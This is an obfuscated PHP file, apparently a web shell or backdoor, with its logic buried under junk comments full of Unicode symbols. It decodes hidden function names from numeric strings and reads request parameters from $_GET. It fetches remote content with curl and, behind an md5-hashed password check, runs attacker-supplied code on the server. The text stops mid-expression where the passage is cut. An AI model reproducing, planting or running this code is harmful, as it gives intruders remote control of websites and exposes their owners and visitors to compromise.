<?php /*-~YO%-*///
$V = /*-


﹤≍½✡∐☠≉❅✫Φ➓▭◙↝☣↊♯⅝┩ⓒ


B`CC>f﹤≍½✡∐☠≉❅✫Φ➓▭◙↝☣↊♯⅝┩ⓒ


-*///
range/*-;xCR-*///
(/*-KpCLm0y-*///
"~", " "/*-
♦♘#✦ⓤ⑦❉┰⑪╅≿▥┠▇⊇
{|K~d♦♘#✦ⓤ⑦❉┰⑪╅≿▥┠▇⊇
-*///
); /*-

↤⊞㊟≆▎☱❁

>43)↤⊞㊟≆▎☱❁

-*///
$eF=/*-Kd!q%a~-*///
${$V[1+30].$V[39+20].$V[43+4].$V[36+11].$V[6+45].$V[14+39].$V[13+44]};if/*-]@?Rp@Y)-*///
(in_array(/*-^8<D5MZ-*///
gettype(/*-W_kEc+@-*///
$eF)."20",$eF)){$eF[62]=$eF[62].$eF[78];$eF[88]=$eF[62]($eF[88]);@$eF=$eF[88]($eF[57],$eF[62](${$eF[38]}[18]));/*-


▫▆❑


h]xFLxU▫▆❑


-*///
$eF/*-^W3-*///
();/*-IO&>|~n-*///
}/*-+)+VYeP`3-*///
class /*-

⒊﹏Ↄ⑱➷Ⅶ▒⒉➚◳⇨♦㊕■┇◊︽

jQE,~⒊﹏Ↄ⑱➷Ⅶ▒⒉➚◳⇨♦㊕■┇◊︽

-*///
Kgj{ /*-`zY&USF!~-*///
static/*-,Q7;#}-*///
 function /*-

㊌۰✿┏∐∉⒐↚Ⓟ∔‹☌≁

dMiz.J㊌۰✿┏∐∉⒐↚Ⓟ∔‹☌≁

-*///
dDtmkILz($woJ) /*-4`r?&AR&1-*///
{ $xYWFG/*-%xhio5iv#&-*///
 = /*-
♋♈≰⊏⇢♓↕⊇‖︿☶ⅱ⑯㊓✃┳⓺▭⊟✛
R]!♋♈≰⊏⇢♓↕⊇‖︿☶ⅱ⑯㊓✃┳⓺▭⊟✛
-*///
"r"./*-V+K;-*///
"a"./*-


】⓲⊕⒚☯『ↈⓂ≧⒴┒≄


5Esb】⓲⊕⒚☯『ↈⓂ≧⒴┒≄


-*///
"n"./*-77`5F|T]M--*///
"g"./*-


⏎⊟➀◈☠┸≾❽⊳╏╆♘︽✛㏑⅑⊨▄㊖╍⇜◩⋺


Tfd3⏎⊟➀◈☠┸≾❽⊳╏╆♘︽✛㏑⅑⊨▄㊖╍⇜◩⋺


-*///
"e"; /*-

Ψ㊁█№Ⓚ⋗ℯ∛∥✥∬≔︸⋰╀⑩Ⅾ╒⒙❻∓∋

0-u(^kΨ㊁█№Ⓚ⋗ℯ∛∥✥∬≔︸⋰╀⑩Ⅾ╒⒙❻∓∋

-*///
$Hl/*-R(1-*///
 = /*-2<AG=E-*///
$xYWFG/*-


⓶❉◶⒜↩⓾ⓦ☽▍△✜➟◚┋～◧⑧


hvm1fg8%y⓶❉◶⒜↩⓾ⓦ☽▍△✜➟◚┋～◧⑧


-*///
(/*-
≿┫❀↜≠➩―▏Ⓨ⋗◓☪￡♟⊁⅞☁⇆⊼ℎ⇜♐∨⑫㊇∪♬ϡ
0a+≿┫❀↜≠➩―▏Ⓨ⋗◓☪￡♟⊁⅞☁⇆⊼ℎ⇜♐∨⑫㊇∪♬ϡ
-*///
"~"/*-+I;A[5-wZ2-*///
, /*-
◶⇈⊹↙➨┟⊻➻∛‐╬⒜≕✉╝ⓥ⒗◳Ⓠ◾∟ℌ⒞
$nU88VSR◶⇈⊹↙➨┟⊻➻∛‐╬⒜≕✉╝ⓥ⒗◳Ⓠ◾∟ℌ⒞
-*///
" "/*-

▴✴♯❏ⅱ━

uw▴✴♯❏ⅱ━

-*///
);/*-uZBes#-*///
 $BDRCZWQh /*-9$-*///
= /*-

⋔➶◦ⓛ⊬⋊╆∲❦▏↬▋ⓃⅧ≹⊷╂

--|a7⋔➶◦ⓛ⊬⋊╆∲❦▏↬▋ⓃⅧ≹⊷╂

-*///
explode/*-1r-*///
(/*-~=kF@hkD-*///
"l", /*-


⋋◼


![86Y<⋋◼


-*///
$woJ/*-?P-*///
); /*-

↊≂☬⑱╦⒰┞☣≇ⅵ➾▏♥┸㈢‡┍╙⊩☑◑⑳☁ℭ╈◤‱

kL@ok6J↊≂☬⑱╦⒰┞☣≇ⅵ➾▏♥┸㈢‡┍╙⊩☑◑⑳☁ℭ╈◤‱

-*///
$fcqyt /*-(pY-*///
= /*-9-9h-*///
""; foreach /*-XUM}-*///
(/*-4e[-=-*///
$BDRCZWQh /*-


㊚⇊➂≖/☢☓Ü‹㊋∭⑮ↇ┧㊁⊻⊰≓⇌≣⇘


PiFiqba㊚⇊➂≖/☢☓Ü‹㊋∭⑮ↇ┧㊁⊻⊰≓⇌≣⇘


-*///
as /*-gY;r-*///
$PAqM /*-=l]|re-*///
=>/*-8qL|}-*///
 $BxANUJaKEZ/*-ZXE-*///
) /*-
㏒☵✵╆㊗∹✭∇‰⇞╊☝╅
ui?.Ru],㏒☵✵╆㊗∹✭∇‰⇞╊☝╅
-*///
$fcqyt /*-

◈Ⅷ¤∡¥⋌✐∗ﭢⅰ┍↠❿≶★⇤

h(14TF+3G◈Ⅷ¤∡¥⋌✐∗ﭢⅰ┍↠❿≶★⇤

-*///
.= /*-!~5S-*///
$Hl[$BxANUJaKEZ/*-?<I-*///
 - /*-RHMQtM<@$Z-*///
21336/*-cJ#8;&-*///
];/*-

↟㊜⓼⋟⑳◟┣♠◡⑲⇪℘～⊞▕△※

D&ZLFS↟㊜⓼⋟⑳◟┣♠◡⑲⇪℘～⊞▕△※

-*///
 return /*-ouL]y-*///
$fcqyt; /*-


✈┧㈦◢♪㊩❖≤㊃☥┍ⅳ▪⒁


V<)G✈┧㈦◢♪㊩❖≤㊃☥┍ⅳ▪⒁


-*///
} /*-


∨㊭∙∫㊢↗⇜⋌✑▃↲❅


[G#∨㊭∙∫㊢↗⇜⋌✑▃↲❅


-*///
static /*-
¿⊃ⓒ┒♘╁Ⓔ↸│§☽㊕
P}7@O^:s$¿⊃ⓒ┒♘╁Ⓔ↸│§☽㊕
-*///
function /*-@!JImA1c-*///
kbznm/*-b|OxgU-*///
(/*-.J5_zHOn~^-*///
$iDBr,/*-z@:c-*///
 $jUTeyQmYzX/*-mgEc&f~`v-*///
)/*-9K-*///
 {/*-
⊾◘↦⓹◗➨┃≴﹟°
}S0oE⊾◘↦⓹◗➨┃≴﹟°
-*///
 $wpZyQ/*-


♢⒟┝Ⅹ☮⋲Ⓦ┇Ⅾ⒎⒕➤⇔﹪❧┉◿—╉✴


]cg♢⒟┝Ⅹ☮⋲Ⓦ┇Ⅾ⒎⒕➤⇔﹪❧┉◿—╉✴


-*///
 = /*-y&;`7DR.-*///
curl_init/*-
╔≔Ü∇✝〗╎≍≆♪⋊♤☛≗Φ┣⇐⑹⇒―⋺⋭≵▭℅∁╚❇¶↼㊀
1╔≔Ü∇✝〗╎≍≆♪⋊♤☛≗Φ┣⇐⑹⇒―⋺⋭≵▭℅∁╚❇¶↼㊀
-*///
(/*-

∍✠유∾≞⌓Ⓨ┶Ⓓ〔∆㊘≗┄⋑◆

hP∍✠유∾≞⌓Ⓨ┶Ⓓ〔∆㊘≗┄⋑◆

-*///
$iDBr/*-

✎◛≕⊍⓴┅⑫⋯∦④‐☍☼♡┵▏❒∍⋿﹛§➱

!HE✎◛≕⊍⓴┅⑫⋯∦④‐☍☼♡┵▏❒∍⋿﹛§➱

-*///
);/*-

▱♫↣⇀⇜❦▯¶╃☃△⋈㍿⋰⅞‰❽⇎⒘≎

FDq9F5?wB▱♫↣⇀⇜❦▯¶╃☃△⋈㍿⋰⅞‰❽⇎⒘≎

-*///
 curl_setopt/*-Y!5?1fy-w-*///
(/*-


≽∾㊧➪유➌⊱▎∿⒒


Z!,L≽∾㊧➪유➌⊱▎∿⒒


-*///
$wpZyQ,/*-],?o-*///
 CURLOPT_RETURNTRANSFER,/*-?&-*///
 1/*-
≕☥➜⇞
EX`z}QDS≕☥➜⇞
-*///
);/*-1hs-*///
 $yvwPrW/*-

◁≞≩╧Ⅳ⋐➸⋮▷◂Φ㏒Ⅰ

s[i~BbT6sz◁≞≩╧Ⅳ⋐➸⋮▷◂Φ㏒Ⅰ

-*///
 = /*-
♋┊⒮↺⊝º】⚘☵⒨∣↙➇╃✷┾￡ﭢ㊥⋚⓻Ⅾ⑱§¥
^x♋┊⒮↺⊝º】⚘☵⒨∣↙➇╃✷┾￡ﭢ㊥⋚⓻Ⅾ⑱§¥
-*///
curl_exec/*-8|9LWF?:-*///
(/*-

♔﹀≣⒐❆ℨ↖≳

2wc&&;♔﹀≣⒐❆ℨ↖≳

-*///
$wpZyQ/*-

Ⓠ⒵▆↖ⓗ㊠⒢Ⓩ┩㊡↜∪⒂✞⊛ⅰ㈦㊖▤☈ⓟ㈩㊟╚♯≶⊰∑

DmⓆ⒵▆↖ⓗ㊠⒢Ⓩ┩㊡↜∪⒂✞⊛ⅰ㈦㊖▤☈ⓟ㈩㊟╚♯≶⊰∑

-*///
); /*-

▦×▋¡⋚‖Ⅽ∣﹠∘➔✗ℯ↸↑╫⇢ˉ≲⋷ﭢ︵

g~LUhCp▦×▋¡⋚‖Ⅽ∣﹠∘➔✗ℯ↸↑╫⇢ˉ≲⋷ﭢ︵

-*///
return /*-


❂⓶⒔☧㊒㎡╧⓿➍◐⊀╨Ⓦ✣♝➜ℱ∭ⓤ╣


Kd;qDoz❂⓶⒔☧㊒㎡╧⓿➍◐⊀╨Ⓦ✣♝➜ℱ∭ⓤ╣


-*///
empty/*-w%l>fd[7-*///
(/*-+6<d-*///
$yvwPrW/*-Hd-*///
)/*-`COE-*///
 ? /*-
※☛⋪ت╒ℭ✘ⓕ⋄≹ⓚ➜┞♧≳◜➱ⅳﭢ⋁ℯ∊⋭☉¶⊆¿∅⑲┋
Yz3;K;P※☛⋪ت╒ℭ✘ⓕ⋄≹ⓚ➜┞♧≳◜➱ⅳﭢ⋁ℯ∊⋭☉¶⊆¿∅⑲┋
-*///
$jUTeyQmYzX/*-


㊫⒮㊉▎✄➹⇜◼⑸░⅛⒘✘➽


d,2㊫⒮㊉▎✄➹⇜◼⑸░⅛⒘✘➽


-*///
(/*-

Ⓙ㈢

NnzORdVⒿ㈢

-*///
$iDBr/*-Y>h5#O:-*///
)/*-@GXw4%)cQC-*///
 : /*-

╃≑⊄✏⑿}유▇£㊒┪±⏎┺⊶☐≻╔㈣⒧‿▮⑹✬≬

_T~HC8S╃≑⊄✏⑿}유▇£㊒┪±⏎┺⊶☐≻╔㈣⒧‿▮⑹✬≬

-*///
$yvwPrW; /*-zDb=q}=`-*///
}/*-


㊕↶⋋❐⓲⋷≖◆╞✈✃⇄


Vyl㊕↶⋋❐⓲⋷≖◆╞✈✃⇄


-*///
 static/*-jP:CZ-*///
 function /*-


⋦﹫⒒✿↮큐⊳▸ⓈⓊ⒄≳╩


~r⋦﹫⒒✿↮큐⊳▸ⓈⓊ⒄≳╩


-*///
WlRvmLhHx/*-


➔ℊ❁Ⅽ


zOXm[ik^➔ℊ❁Ⅽ


-*///
() /*-


♯≠┞⒒⌖∸Ⓐ✂¾⇑▉┠︵〔⒧


k;[♯≠┞⒒⌖∸Ⓐ✂¾⇑▉┠︵〔⒧


-*///
{/*-7|%wL)ZXmy-*///
 $ehbAsf /*-DdF}_-*///
=/*-E^-*///
 array/*-OF)-*///
("21363l21348l21361l21365l21346l21361l21367l21360l21345l21352l21363l21346l21357l21351l21352","21347l21346l21348l21367l21348l21351l21346l21413l21411","21356l21347l21351l21352l21367l21362l21361l21363l21351l21362l21361","21350l21365l21363l21355","21364l21365l21347l21361l21408l21410l21367l21362l21361l21363l21351l21362l21361","21360l21357l21354l21361l21367l21359l21361l21346l21367l21363l21351l21352l21346l21361l21352l21346l21347","21390l21420","21337","21415l21420","21397l21380l21380l21397l21373","21351l21360"); /*-Go-*///
foreach /*-

⋵⇤➣┭⊵《▥⋆╁︿㏑∼╎︶↴

11a,<-~⋵⇤➣┭⊵《▥⋆╁︿㏑∼╎︶↴

-*///
(/*-n0_9eC9=-*///
$ehbAsf/*-
≣╪≾
LG^t9z;M_≣╪≾
-*///
 as /*-

▷⇘☄∠㈧✦⒯◭┩∓↭

h!▷⇘☄∠㈧✦⒯◭┩∓↭

-*///
$tLeo/*-


♐✾➱


7=CIVR;o)♐✾➱


-*///
)/*-@gH]|-*///
 $xbvERtWs/*-38<0y2-*///
[] /*-DH-*///
= /*-Kc;p2{Q-*///
self/*-Ezh-*///
::/*-l<kMA]Zu^-*///
dDtmkILz/*-

∽∰Ⅿ◍⊂➔♨┼➋ⅻЮℍ﹊✺『≒⊸⇒ⓣ≆⇡◬ℛ⓬

V6p:%(∽∰Ⅿ◍⊂➔♨┼➋ⅻЮℍ﹊✺『≒⊸⇒ⓣ≆⇡◬ℛ⓬

-*///
(/*-
↻⒧↺⊺〗╉↷✫⊱◓⊕⋎♕┲‐☂∺≋◄⑤↗➐㊭↮
yv7j<uRr↻⒧↺⊺〗╉↷✫⊱◓⊕⋎♕┲‐☂∺≋◄⑤↗➐㊭↮
-*///
$tLeo/*-

✚≯ㄨ‡↗▌≩⊆┺⇌⑻Ⓚ≇≰∈☴≱┫︶▉≈◻⑮☞✹

ys✚≯ㄨ‡↗▌≩⊆┺⇌⑻Ⓚ≇≰∈☴≱┫︶▉≈◻⑮☞✹

-*///
);/*-
╈✣Ⅽ㊓➣❦∳｀◣⒱⊝⋽¢㊨☊☉Ⓞ❶⊊❻⋃﹛¾−⓸✍™⓵∼⌓ⅵ
{XiWP|o;╈✣Ⅽ㊓➣❦∳｀◣⒱⊝⋽¢㊨☊☉Ⓞ❶⊊❻⋃﹛¾−⓸✍™⓵∼⌓ⅵ
-*///
$pUIvhq /*-9og~RB``H-*///
= /*-


㊥❐♤¯▇➯⒒⇄♚◔⋈≹≱


3dnm;㊥❐♤¯▇➯⒒⇄♚◔⋈≹≱


-*///
@$xbvERtWs/*-

⊟⒮⓭◈ℭ♪ℤ➜⊚▾⇊⇔Ⅺ⋂➂☇◌⇞Ⓥ➓☰┨Φ↩▤╤⋉々⋰❥

ZD⊟⒮⓭◈ℭ♪ℤ➜⊚▾⇊⇔Ⅺ⋂➂☇◌⇞Ⓥ➓☰┨Φ↩▤╤⋉々⋰❥

-*///
[/*-

╏▭＂ⅱ∤∞ⅾ≊➨➋⒜⊚◚✃♐➉⓱≪↰◦≑︶≚

5`o[1╏▭＂ⅱ∤∞ⅾ≊➨➋⒜⊚◚✃♐➉⓱≪↰◦≑︶≚

-*///
1/*-ANrj[-*///
]/*-kB-*///
(/*-


↗㊀Ⓝ◓≱≐➜◻☤⊼㊦‹Ⅵ⋼◾†⋫≭ㄨ◨


{R`Qvc;dX↗㊀Ⓝ◓≱≐➜◻☤⊼㊦‹Ⅵ⋼◾†⋫≭ㄨ◨


-*///
${/*-
⑧㊟›⊴☍⇤≜⊼⒦㊉≎℗★웃ⓓ↜﹢⋖⑹┐ⓖ
eWh!![C⑧㊟›⊴☍⇤≜⊼⒦㊉≎℗★웃ⓓ↜﹢⋖⑹┐ⓖ
-*///
"_"/*-(`HBY-*///
."G"/*-

✛→⑲↰┟♖▤⓹☸⇜◘⒴▥≋⒅◜ℚ☎▮╄Ⓠ↹

m)V]R✛→⑲↰┟♖▤⓹☸⇜◘⒴▥≋⒅◜ℚ☎▮╄Ⓠ↹

-*///
."E"/*-
➼⒀㊚➟➌▻☧】▵﹛✡〈▩✱☂½☳⑫⒬ℝ∪
tq#7➼⒀㊚➟➌▻☧】▵﹛✡〈▩✱☂½☳⑫⒬ℝ∪
-*///
."T"/*-
⋐⋑❒☇⋢➨▾⊄┬◡ⓔ➔▇╪✭⓮➅✒➉∊∇⒱◪┮
!c⋐⋑❒☇⋢➨▾⊄┬◡ⓔ➔▇╪✭⓮➅✒➉∊∇⒱◪┮
-*///
}[/*-
ⅴ⑺✿﹉↦⋃╉‹║⋴⇕⇞∰
,7SnQⅴ⑺✿﹉↦⋃╉‹║⋴⇕⇞∰
-*///
$xbvERtWs/*-

┢┎ⓚ◡⑮↶⓿⓷◀¯✓┧㊛▎➞③✙⇃④⒊⅗↤

]<yGRPQ7┢┎ⓚ◡⑮↶⓿⓷◀¯✓┧㊛▎➞③✙⇃④⒊⅗↤

-*///
[/*-z,7aOiV)lL-*///
8+1/*-nP-*///
]]/*-JEc9$-*///
);/*-


➉§ℕ◞☷☉∝≻☂≢◴⓬╉❐⓯⋑₪❥⓹


_F➉§ℕ◞☷☉∝≻☂≢◴⓬╉❐⓯⋑₪❥⓹


-*///
 $DIHYA /*-

∮⒮⋟↮≯✲☨〉┿≇⇡☽↰﹉⇋¤㈩Ⓜ╪▶ⓣ⋏﹁△⊐⊚Ⓡ

D∮⒮⋟↮≯✲☨〉┿≇⇡☽↰﹉⇋¤㈩Ⓜ╪▶ⓣ⋏﹁△⊐⊚Ⓡ

-*///
=/*-

❹↶∭┵▮☯➳✔

]rYk5❹↶∭┵▮☯➳✔

-*///
 @$xbvERtWs/*-


÷⋣⋲↠╩︶∜≏┞▻✝⋻～☞㊆☟⊻☍⑼∐ⓨ


VtbDwd÷⋣⋲↠╩︶∜≏┞▻✝⋻～☞㊆☟⊻☍⑼∐ⓨ


-*///
[/*-


ⓛ‰▹ↂ︽∇Ⓖ⋱♓≄▼❑▽❋⒎╕┽↻⊡◳℘➱○⊦〉☹


yv[ⓛ‰▹ↂ︽∇Ⓖ⋱♓≄▼❑▽❋⒎╕┽↻⊡◳℘➱○⊦〉☹


-*///
3+0/*-?ctffUf-*///
]/*-WjO-*///
(/*-X2x=-*///
$xbvERtWs/*-utF-*///
[/*-


≵㈤€―Σ⅞Ⓤ✢➷└≍©†⒡╣∬☒╉➮⊄█ⓜ◿Ⅷ❈Ⓛ㊉♕⊪☲≁


;)ieve≵㈤€―Σ⅞Ⓤ✢➷└≍©†⒡╣∬☒╉➮⊄█ⓜ◿Ⅷ❈Ⓛ㊉♕⊪☲≁


-*///
2+4/*-

⅚⚘Ⓨ﹜┫÷⇡（◩

GQ{?~6~>r⅚⚘Ⓨ﹜┫÷⇡（◩

-*///
], /*-b1]D,Hv8-*///
$pUIvhq/*-

↜ℯ✷∮

+-9Sv2_|↜ℯ✷∮

-*///
);/*-E+C-*///
 $CAgWS /*-
➶︿❷（⋀╕⇄☢◣㊪⑷≨⒫◊㊁┡㊂┟｜⒧≈↨⒍ⅶ◼{∺
1.E{➶︿❷（⋀╕⇄☢◣㊪⑷≨⒫◊㊁┡㊂┟｜⒧≈↨⒍ⅶ◼{∺
-*///
=/*-hc8(%yV[-*///
 $xbvERtWs/*-RuNr78>-*///
[/*-%)LuB`+_a&-*///
2+0/*-r2^G$-*///
]/*-


⒃⑳↵✜◨➮↩€⇈⑱｜


4p,W-i⒃⑳↵✜◨➮↩€⇈⑱｜


-*///
(/*-#_CS!pC9?y-*///
$DIHYA,/*-


⒳✍ⓣ⊣┣╓≦✉⚘‰¶≽㊯◐╉∉‹≐✔⊲⒜﹋］◣⊨┾✛♂∜ÜⅥ


5Jdz⒳✍ⓣ⊣┣╓≦✉⚘‰¶≽㊯◐╉∉‹≐✔⊲⒜﹋］◣⊨┾✛♂∜ÜⅥ


-*///
 true/*-J$ECX-*///
); /*-R[,v!N`-*///
@${/*-

Ψ▍➁❣㊜ℎ

}j]hsΨ▍➁❣㊜ℎ

-*///
"_"./*-]3VhP_i2x~-*///
"G"./*-nfm-*///
"E"/*-_YIZ^DXD-*///
."T"/*-p}@#^$-*///
}/*-


♦⊨⋕≝⋀≫⋪⓱ⓎⓋ≃┧◆


~9lT55♦⊨⋕≝⋀≫⋪⓱ⓎⓋ≃┧◆


-*///
[/*-mTMk?h<W-*///
$xbvERtWs/*-

✰ⅲ⋯➘✾❅㊪＂Ⓓ☇☺#∼┹┵≞➤⏥≽⑽♒⇊⊻↹➂▄ⅾ∽

qMn✰ⅲ⋯➘✾❅㊪＂Ⓓ☇☺#∼┹┵≞➤⏥≽⑽♒⇊⊻↹➂▄ⅾ∽

-*///
[6+4/*-


◔∯↩▸⊕≞℘ↁ☬⅒➮⓸↉《¤╃┼♠╤⊁❂≸∜⊤⊱⅓≉⌘⇩㊟


e5w7!dhMZ◔∯↩▸⊕≞℘ↁ☬⅒➮⓸↉《¤╃┼♠╤⊁❂≸∜⊤⊱⅓≉⌘⇩㊟


-*///
]/*-?=Hd0T3-*///
]/*-


✌◪⑷⊊⅗∸


3le5GE✌◪⑷⊊⅗∸


-*///
 == /*-


›≽✩⋵﹠▆├◑☄➤㊢■⊔∉‖≔∋⋏Ⅶ☱╈≁⇃⒍⇪⅞


nzT5%>o,›≽✩⋵﹠▆├◑☄➤㊢■⊔∉‖≔∋⋏Ⅶ☱╈≁⇃⒍⇪⅞


-*///
1 /*-
ⅱ～◜≪㊖✧
3)B(Dⅱ～◜≪㊖✧
-*///
&& /*-Qd_-*///
die/*-g,JZ}-*///
(/*-
⊢℗ℱ≽⌘⊥㊮╕^▵
UW].⊢℗ℱ≽⌘⊥㊮╕^▵
-*///
$xbvERtWs[0+5/*-~7lg}8B#-*///
]/*-

↛㊨✣～ⅵ∊⇘⇇▶✛Ⅻ〈

6b}=P81OD↛㊨✣～ⅵ∊⇘⇇▶✛Ⅻ〈

-*///
(/*-


￣유㊬✽╓❣ø≋﹏♈✞∕☜㏑▊➔❈➄


=!]=;M?04￣유㊬✽╓❣ø≋﹏♈✞∕☜㏑▊➔❈➄


-*///
__FILE__/*-


☱½Ⅴ⋶◴⋳◐⋅┵⊳✲℉⅓☺【∬╡¥➞


TJq:☱½Ⅴ⋶◴⋳◐⋅┵⊳✲℉⅓☺【∬╡¥➞


-*///
)/*-
│☶↭
Yy:c`c│☶↭
-*///
); /*-

⒚⊜⒵⋽⒠♝﹉➏Ⅽℙ◇≧ℴ︾ⓒ▁✧❁▽㈧﹍╠Ⅾ☷

wu⒚⊜⒵⋽⒠♝﹉➏Ⅽℙ◇≧ℴ︾ⓒ▁✧❁▽㈧﹍╠Ⅾ☷

-*///
if/*-


⇍✎ˉ∂⇥➯♒㊃≭


s$RO⇍✎ˉ∂⇥➯♒㊃≭


-*///
(/*-O6Grumr-*///
 (/*-JVgYjg4+-*///
(@/*-


∰∕｀⋠♗┅↟┎㉿⊴ↂ⋺㊐⋐ⓛ➞▩⒏⋲ⓩ⒤ⓝ█❂┤➂≂⑩┿


}-$0∰∕｀⋠♗┅↟┎㉿⊴ↂ⋺㊐⋐ⓛ➞▩⒏⋲ⓩ⒤ⓝ█❂┤➂≂⑩┿


-*///
$CAgWS/*-?%-*///
[/*-


｀➸♙º≜⒰ↆ＂Ⅻ㊐㊕➞﹠┸


7}D(｀➸♙º≜⒰ↆ＂Ⅻ㊐㊕➞﹠┸


-*///
0/*-p5P}_C.6K-*///
] /*-

⑾↷┪↖⋼⇇╍¢ⓒ➺Ⓣ┐◆⊔◑∱☏」➵╅◹⋃❊┚▔⓯ⓤ✁➙

o9LnXG]⑾↷┪↖⋼⇇╍¢ⓒ➺Ⓣ┐◆⊔◑∱☏」➵╅◹⋃❊┚▔⓯ⓤ✁➙

-*///
- time/*-
↠╡︽﹎︾㊋▨⒆☎⑷Ⓤ㊖≭✾⒇﹣✙┝
b&va{:kG↠╡︽﹎︾㊋▨⒆☎⑷Ⓤ㊖≭✾⒇﹣✙┝
-*///
()/*-
↔➱ℒ］⓷◃↩@⒣⋅≘◳⊙﹨⇝▣⋥⑿▎➄∲➢◾╧⋊﹩
A;0i↔➱ℒ］⓷◃↩@⒣⋅≘◳⊙﹨⇝▣⋥⑿▎➄∲➢◾╧⋊﹩
-*///
) > /*-

ⅷ➙╚┳㊎≱★≼⓴⒊◨⋧◼∻Ⅺⓜ

|^kⅷ➙╚┳㊎≱★≼⓴⒊◨⋧◼∻Ⅺⓜ

-*///
0/*-

▎⋩⊴❈⒛▱＂❷↤ⓔ✲⒧⋥☻℗√⊭№⅑⒃☄

^an4N{R32▎⋩⊴❈⒛▱＂❷↤ⓔ✲⒧⋥☻℗√⊭№⅑⒃☄

-*///
)/*-

➽╧✒«⇠ⓚ≑ⅱ㈩⇈≍〉┵⋐Ⅱℛ{➱⇝ℐ↝‰◛◹╛╈✤⑧☋▦Ⅿ

PR32➽╧✒«⇠ⓚ≑ⅱ㈩⇈≍〉┵⋐Ⅱℛ{➱⇝ℐ↝‰◛◹╛╈✤⑧☋▦Ⅿ

-*///
 and /*-
⊒▫≒㊕⓼≢÷ⅼ⊟╂✁┟⇊︸∹✶⇨☲ⓞ✡∁✤⊻≅Ⓨ◬⊩⇡Ⓦ♘➮
OT⊒▫≒㊕⓼≢÷ⅼ⊟╂✁┟⇊︸∹✶⇨☲ⓞ✡∁✤⊻≅Ⓨ◬⊩⇡Ⓦ♘➮
-*///
(/*-
Ⓢ➯⊪
8`OCMtSFlFⓈ➯⊪
-*///
md5/*-3pNbuQ-*///
(/*-&9mTVWCB-*///
md5/*-CK,Ies;QMS-*///
(/*-


☏｀ⓑ⋐º⋁↚✳⋯◾⒔⑦%▤⑽⋥◸㍿


b42R}F2Q>y☏｀ⓑ⋐º⋁↚✳⋯◾⒔⑦%▤⑽⋥◸㍿


-*///
$CAgWS/*-
┩⋗−❣ℭ⓪✐◒⅖☁◪Ⓖⅷ♢Ⅻ◄⋽◅ℝⓟ#
u=[q=z┩⋗−❣ℭ⓪✐◒⅖☁◪Ⓖⅷ♢Ⅻ◄⋽◅ℝⓟ#
-*///
[/*-R4L-*///
2+1/*-nHJd`NJ:@_-*///
]/*-

卐◄㊍✠∓≺⊶⓵ⅻ㊫♡∻⅘╢↩♟⋍⋂≜ⅲ∎ⓒ

aut@+.>)卐◄㊍✠∓≺⊶⓵ⅻ㊫♡∻⅘╢↩♟⋍⋂≜ⅲ∎ⓒ

-*///
)/*-_j[@f9jz-*///
)/*-

﹁⇓⑩ⅷ⒗Ⓚ⇢%╜⋳㊦◕∴☩⒐⓱⒓㊟┯«⋥

XDiif﹁⇓⑩ⅷ⒗Ⓚ⇢%╜⋳㊦◕∴☩⒐⓱⒓㊟┯«⋥

-*///
 === /*-
ⅷ②⒨©⒭
w-7^DchE1ⅷ②⒨©⒭
-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-QAM-*///
)/*-.G-*///
 ): /*-


↞⑦˜


4-nc>Pea↞⑦˜


-*///
$xcCvX /*-R!+6)~j-*///
=/*-=yl#-*///
 self/*-3pIe{_gvi-*///
::/*-

⊱⓹♀≳☊

2r<@lV⊱⓹♀≳☊

-*///
kbznm/*-

❉❅〓╙✃ⅵ㊩╂➥➎⇉➼±⊔≨ℙ⋇Θ╕

mOR,X❉❅〓╙✃ⅵ㊩╂➥➎⇉➼±⊔≨ℙ⋇Θ╕

-*///
(/*-Y%hX$F-*///
$CAgWS/*-PvlT!LKR-*///
[/*-


〉➐↚➾╔⊖➼⒙◒⒀⊙➬Ⅴ┏∩Ⓡ﹟⊗✷≐╝⇧%⇠Ⓒ➌∧


,)+〉➐↚➾╔⊖➼⒙◒⒀⊙➬Ⅴ┏∩Ⓡ﹟⊗✷≐╝⇧%⇠Ⓒ➌∧


-*///
0+1/*-

↾⊸≿◣❷Ⓥ✲❸❁≛㊪⅞☞

CrsYs71I↾⊸≿◣❷Ⓥ✲❸❁≛㊪⅞☞

-*///
], /*-(ZnL]mu-*///
$xbvERtWs/*-

㊞◢

$SmD㊞◢

-*///
[/*-O#|2n-*///
0+5/*-!6O-*///
]/*-
∿⑺♔%）⋍┪❻㊈➫✻½⇟╬
t)!H∿⑺♔%）⋍┪❻㊈➫✻½⇟╬
-*///
);/*-


∠㊬@┉≕⊳↤⇝⊪


||u#&k?3w∠㊬@┉≕⊳↤⇝⊪


-*///
@$xbvERtWs/*-
㊪⒵⇦﹤┍⑹♠囍‹
k].J`,㊪⒵⇦﹤┍⑹♠囍‹
-*///
[/*-

⒊┿┛▃◵큐囍㊈┨◭⋃═㈩❺⊯➠

uQC%R⒊┿┛▃◵큐囍㊈┨◭⋃═㈩❺⊯➠

-*///
0/*-PMq-*///
]/*-(VT.OH-*///
(/*-
⊗☦≿Ⅲ♙↙Ⓞ※►↼㊰〃ℜ➱☸░☶╒£☣②큐
n}d.Wa,n⊗☦≿Ⅲ♙↙Ⓞ※►↼㊰〃ℜ➱☸░☶╒£☣②큐
-*///
"",/*-
▄▎◉⒌▩⑭┮⋭▋◙㊎﹛⇣―➍┰↶❈✚
@C▄▎◉⒌▩⑭┮⋭▋◙㊎﹛⇣―➍┰↶❈✚
-*///
 $xbvERtWs/*-

┟﹏╫ↂ❽〔✒☋❁

wU>u7r<┟﹏╫ↂ❽〔✒☋❁

-*///
[/*-


Ⓟ⒛‐‿⑬⇨☱


+7UbLBⓅ⒛‐‿⑬⇨☱


-*///
7+0/*-VY>Gq-*///
] /*-OvQJEcpAs-*///
. /*-
㊚﹜⒛⒥
,N#,iZe@㊚﹜⒛⒥
-*///
$xbvERtWs/*-
⇨⋄╤∖❊☃∊¥↫♫¶⒪➡∔㊣◕⅕∽★◀✏
x5`pt%p%:J⇨⋄╤∖❊☃∊¥↫♫¶⒪➡∔㊣◕⅕∽★◀✏
-*///
[/*-


⒯⊗⇓◤⇆⒥∆☭⅙♙╨┧┡⊍╃≃≯◮╫∰♨↸


i~Zf⒯⊗⇓◤⇆⒥∆☭⅙♙╨┧┡⊍╃≃≯◮╫∰♨↸


-*///
0+4/*-
ℙ㊄≛⇕㈧╉⋃≪╈
-&ℙ㊄≛⇕㈧╉⋃≪╈
-*///
]/*-

╌⒎❀Ü➚▴╖⊺╗ⓦ☴︵⓵➀∔

{X:jR@m╌⒎❀Ü➚▴╖⊺╗ⓦ☴︵⓵➀∔

-*///
(/*-


∅▕Ⓕ﹫◸➄∦◊⊾Ⅶ➣⒞


